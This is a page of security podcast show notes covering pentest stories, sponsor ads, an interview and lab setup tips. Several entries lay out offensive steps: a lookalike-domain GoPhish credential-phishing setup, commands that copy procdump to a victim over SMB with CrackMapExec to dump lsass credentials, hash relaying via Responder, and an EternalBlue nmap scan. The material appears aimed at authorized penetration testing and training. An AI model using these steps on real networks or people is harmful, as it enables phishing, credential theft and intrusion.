7MS #32: OSCP – part 3 (audio)

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today I'm joined by a very special guest: Mrs. 7MS! She joins me on a road trip to northern MN, reads me some questions from the 7MS mail bag, and we tackle them together (with a side order of commentary on weddings, overheating iPads, cheap hotels and the realization that this is likely the first - and only episode that Mrs. 7MS has ever listened to). Links to things discussed this episode: Wireless pentest certs: SEC617 - SANS course that covers wifi pentesting (with WPA enterprise attacks) Offensive Security Wireless Professional Good/free pentest training options: Pentester Academy VulnHub Rastalabs The Cyber Mentor Free logging/alerting solutions for SMBs: WEFFLES Logging Made Easy HELK Wazuh

22 Loka 201944min

In this episode I talk about some things I learned about making your own kick-butt cred-capturing phishing campaign and how to do so on the (relatively) quick and (relatively) cheap! These tips include: Consider this list of top 9 phishing simulators. Check out GoPhish! Then spin up a free tier Kali AWS box Follow the instructions to install GoPhish and get it running on your AWS box Use the Expired Domains site to buy up a domain that is similar to your victim - maybe just one character off - but has been around a while and has a good reputation Add a G Suite or O365 email account (or whatever email service you prefer) to the new domain Create a convincing cred-capturing portal on GoPhish - I used some absolutely disguisting and embarassing HTML like this (see show notes on 7ms.us): Use this awesome article to secure your fancy landing page with a LetsEncrypt cert! Have fun!!!

12 Loka 201950min

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..." Relayed one high-priv cred from one box to another Dumped and cracked a local machine's hash Passed that hash around the network Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from Set the wdigest flag via CrackMapExec Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it: mkdir /share wget https://live.sysinternals.com/procdump64.exe screen -R smb /opt/impacket/examples/smbserver.py -smb2support share /share Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe: crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"' (more on today's episode show notes)

1 Loka 201930min

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is about a pentest that was pretty unique for me. I got to ride shotgun and kind of be in the shadows while helping another team pwn a network. This was an especially interesting one because the client had a lot of great security defenses in place, including: Strong user passwords A SIEM solution that appeared to be doing a great job We did some looking for pwnage opportunities such as: Systems missing EternalBlue patch Systems missing BlueKeep patch What got us a foot in the door was the lack of SMB signing. Check this gist to see how you can use RunFinger.py to find hosts without SMB signing, then use Impacket and Responder to listen for - and pass - high-priv hashes. Side note: I'm working on getting a practical pentesting gist together in the vein of Penetration Testing: A Hands-On Introduction to Hacking and Hacker Playbook.

24 Syys 201934min

For Windows VMs Take a snapshot right after the OS is installed, as (I believe) the countdown timer for Windows evaluation mode starts upon first "real" boot. Want to quickly run Windows updates on a fresh Win VM? Try this (here's the source): powershell Install-PackageProvider -Name NuGet -Force powershell Install-Module PSWindowsUpdate -force powershell Set-ExecutionPolicy bypass powershell Import-Module PSWindowsUpdate powershell Get-WindowsUpdate powershell Install-WindowsUpdates -AcceptAll -AutoReboot To turn on remote desktop: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 To set the firewall to allow RDP: Enable-NetFirewallRule -DisplayGroup "Remote Desktop" To stop the freakin' Windows hosts from going to sleep: powercfg.exe -change -standby-timeout-ac 0 To automate the install of VMWare tools, grab the package from VMWare's site, decompress it, then: setup64.exe /s /v "/qn reboot=r" To set the time zone via command line, run tzutil /l and then you can set your desired zone with something like tzutil /s "Central Standard Time" For Linux VMs Get SSH keys regenerated and install/run openssh server: apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service Then grab some essential pentesting tools using Kali essentials, and keep 'em updated git update Next user group meeting September 30!

18 Syys 201938min

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is a continuation of episode #379, where we: Conducted general nmap scans (and additional scans specifically looking for Eternal Blue) Sucked our nmap scans into Eyewitness Captured and cracked some creds with Paperspace Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!) Today, the adventure continues with: Checking the environment for CVE-2019-1040 Picking apart the privileges on my "pseudo domain admin" account Making a startling discovery about how almost all corp passwords were stored Enjoy!

5 Syys 201928min

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! This episode, besides talking about a man who screamed at me for not being on my cell phone, covers another tale of internal network pentest pwnage! Topics/tactics covered include: Review of setting up your DIY pentest dropbox Choosing the right hardware (I'm partial to this NUC) Running Responder to catch creds Using Eyewitness to snag screenshots of stuff discovered with nmap scanning Nmap for Eternal Blue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 Running Sharphound to get a map of the AD environment Cracking creds with Paperspace When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!

30 Elo 201943min

In today's episode, I sit down with Zane West of Proficio. Zane has been in information security for more than 20 years - starting out in the "early days" as a sysadmin and then moved up into global infrastructure architect function in the banking world. Today Zane manages Proficio's solution and product development. I sat down with Zane over Skype to talk about how companies can better analyze and defend their networks against attacks. Specifically, we talk about: How important is it to have an IT background before you jump into security? How can newb(ish) security analysts and pentesters better understand the political/financial struggles a business has, rather than charge in and scream "PWN ALL THE THINGS!" Is there a "right way" to step into an organization, get a lay of the land and discover/prioritize their security risks? Why in the world does it take twenty seven people to run a SOC?! When should an organization consider engaging an MSSP to help them with their security needs? What if your MSP also provides MSSP services? Is that a good or bad thing? What are some tips for successfully deploying a SIEM? What is the cyber kill chain about, and is it only something for the Fortune X companies, or can smaller orgs tip their toe in it as well? (Here's a nice graph to help you understand it)

22 Elo 201954min